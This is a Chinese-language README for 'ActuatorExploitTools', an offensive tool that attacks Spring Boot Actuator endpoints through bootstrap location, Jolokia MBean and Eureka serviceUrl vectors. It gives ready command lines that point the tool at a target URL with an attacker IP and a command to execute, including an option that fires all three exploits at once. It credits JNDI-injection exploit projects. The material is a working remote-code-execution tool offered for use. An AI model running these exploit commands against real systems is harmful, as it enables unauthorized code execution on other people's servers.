• 更新使用https://github.com/hsiafan/requests 发包库，修复https不能发包异常（2021-07-26)
• 更新支持Spring Boot Actuator 2.x, 会自动判断目标Spring Boot Actuator版本，建议使用auto攻击 (2021-07-05)

一款用于攻击spring boot actuator的集成环境，目前集成三种攻击方式，支持攻击spring Boot Actuator1.x、2.x

• spring cloud bootstrap location
• jolokia mbeans
• eureka serviceUrl

工具需要在与目标网络连通的机器上运行，支持交互式攻击和选择Exp自动攻击，交互式攻击适用于众测VPN场景

直接运行即可看到工具说明

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar

交互式攻击：

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc

选择Exp攻击：

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e JolokiaMbean

或者你不想选，可以直接-e All，将会用三种方式攻击

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e All

自动攻击，对于修改配置的攻击方式会在攻击完成时还原配置，默认还原为空，暂不支持自定义参数

感谢以下项目，很多代码和设计都是“参考”自它们：

• JNDI-Injection-Exploit
• JNDI-Exploit-Bypass-Demo
• ShiroExploit_GUI

与及测试项目：

• java-sec-code
• actuator-testbed